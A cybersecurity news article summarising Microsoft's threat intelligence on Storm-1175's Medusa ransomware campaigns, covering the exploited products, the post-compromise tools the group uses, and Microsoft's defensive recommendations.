New findings from Microsoft show that the threat actor Storm-1175 is intensifying high-tempo ransomware operations by aggressively targeting vulnerable, internet-facing systems as an initial entry point. The group, which deploys Medusa ransomware, has been observed exploiting critical flaws in public-facing applications to gain unauthenticated access, enabling rapid compromise of exposed environments and reinforcing a broader trend where external attack surface weaknesses are becoming the primary intrusion vector.
Once inside, Storm-1175 executes a multi-stage attack chain designed for persistence and large-scale impact, including deploying remote monitoring tools, conducting reconnaissance, and moving laterally across networks before exfiltrating data and launching ransomware payloads. Microsoft notes that these operations are opportunistic and fast-moving, combining legitimate administrative tools with stealth techniques to evade detection, underscoring how unpatched web-facing assets are increasingly being weaponized to accelerate ransomware deployment and monetization.
The Microsoft Threat Intelligence mentioned that Storm-1175 operates high-velocity ransomware campaigns that weaponize N-days, targeting vulnerable, web-facing systems during the window between vulnerability disclosure and widespread patch adoption. Following exploitation, Storm-1175 moves from initial access to data exfiltration and deployment of Medusa ransomware, often within a few days and, in some cases, within 24 hours.
Clearly, the threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, the U.K., and the U.S.
“The pace of Storm-1175’s campaigns is enabled by the threat actor’s consistent use of recently disclosed vulnerabilities to obtain initial access,” Microsoft Threat Intelligence researchers wrote in a Monday blog post. “While the threat actor typically uses N-day vulnerabilities, we have also observed Storm-1175 leveraging zero-day exploits, in some cases a full week before public vulnerability disclosure. The threat actor has also been observed chaining together multiple exploits to enable post-compromise activity.”
After initial access, Storm-1175 establishes persistence by creating new user accounts, deploys various tools, including remote monitoring and management software for lateral movement, conducts credential theft, and tampers with security solutions before deploying ransomware throughout the compromised environment.
Storm-1175 rapidly weaponizes newly disclosed vulnerabilities to gain initial access, demonstrating a consistent pattern of exploiting internet-facing systems soon after flaws become public. Since 2023, Microsoft Threat Intelligence has observed the group leveraging more than 16 vulnerabilities across widely used enterprise technologies, including Microsoft Exchange, Papercut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, CrushFTP, GoAnywhere MFT, SmarterMail, and BeyondTrust, underscoring its focus on high-impact platforms to accelerate intrusion and ransomware deployment.
Furthermore, “Storm-1175 has also demonstrated a capability for targeting Linux systems as well: in late 2024, Microsoft Threat Intelligence identified the exploitation of vulnerable Oracle WebLogic instances across multiple organizations, though we were unable to identify the exact vulnerability being exploited in these attacks.”
The threat intelligence team also observed the use of at least three zero-day vulnerabilities, including, most recently, CVE-2026-23760 in SmarterMail, which was exploited by Storm-1175 the week prior to public disclosure, and CVE-2025-10035 in GoAnywhere Managed File Transfer, also exploited one week before public disclosure.
“While these more recent attacks demonstrate an evolved development capability or new access to resources like exploit brokers for Storm-1175, it is worth noting that GoAnywhere MFT has previously been targeted by ransomware attackers, and that the SmarterMail vulnerability was reportedly similar to a previously disclosed flaw; these factors may have helped to facilitate subsequent zero-day exploitation activity by Storm-1175, who still primarily leverages N-day vulnerabilities,” the post added.
During exploitation, Storm-1175 typically creates a web shell or drops a remote access payload to establish its initial hold in the environment. From this point, Microsoft Threat Intelligence has observed Storm-1175 moving from initial access to ransomware deployment in as little as one day, though many of the actor’s attacks have occurred over a period of five to six days.
Storm-1175 has also demonstrated a strong reliance on remote monitoring and management tools during post-compromise activity. Since 2023, the group has used multiple platforms including Atera RMM, Level RMM, N-able, DWAgent, MeshAgent, ConnectWise ScreenConnect, AnyDesk, and SimpleHelp to maintain persistence, enable remote access, and move laterally within compromised environments.
“In many attacks, Storm-1175 relies on PDQ Deployer, a legitimate software deployment tool that lets system administrators silently install applications, for both lateral movement and payload delivery, including ransomware deployment throughout the network,” the researchers detailed. “Additionally, Storm-1175 has leveraged Impacket for lateral movement. Impacket is a collection of open-source Python classes designed for working with network protocols, and it is popular with adversaries due to ease of use and wide range of capabilities.”
Like other ransomware as a service (RaaS) offerings, Medusa offers a leak site to facilitate double extortion operations for its affiliates, where attackers not only encrypt data, but steal the data and hold it for ransom, threatening to leak the files publicly if a ransom is not paid.
To that aim, Storm-1175 often uses Bandizip to collect files and Rclone for data exfiltration. Data synchronization tools like Rclone allow threat actors to easily transfer large volumes of data to a remote attacker-owned cloud resource. These tools also provide data synchronization capabilities, moving newly created or updated files to cloud resources in real-time to enable continuous exfiltration throughout all stages of the attack without needing attacker interaction.
Finally, having gained sufficient access throughout the network, Storm-1175 frequently leverages PDQ Deployer to launch a script (RunFileCopy[dot]cmd) and deliver Medusa ransomware payloads. In some cases, Storm-1175 has alternatively used highly privileged access to create a Group Policy update to broadly deploy ransomware.
To defend against Storm-1175 and similar ransomware activity, Microsoft emphasizes reducing exposure from internet-facing systems by continuously mapping the external attack surface and isolating critical assets behind secure network boundaries such as VPNs, firewalls, or segmented environments. Organizations are urged to prioritize patching vulnerabilities, enforce strong credential hygiene, and limit lateral movement through least-privilege access. Strengthening identity protection is also critical, including enabling features like Credential Guard early in deployment to prevent credential theft.
Microsoft further recommends hardening endpoint defenses by enabling tamper protection and always-on antivirus controls to prevent attackers from disabling security tools. Monitoring and controlling the use of remote monitoring and management software is essential, including enforcing multi-factor authentication for approved tools and investigating any unauthorized deployments.
Finally, organizations should adopt automated detection and response capabilities, such as attack disruption and attack surface reduction rules, to block common ransomware techniques like credential theft, obfuscated scripts, web shell creation, and misuse of administrative tools, thereby containing threats before they escalate.
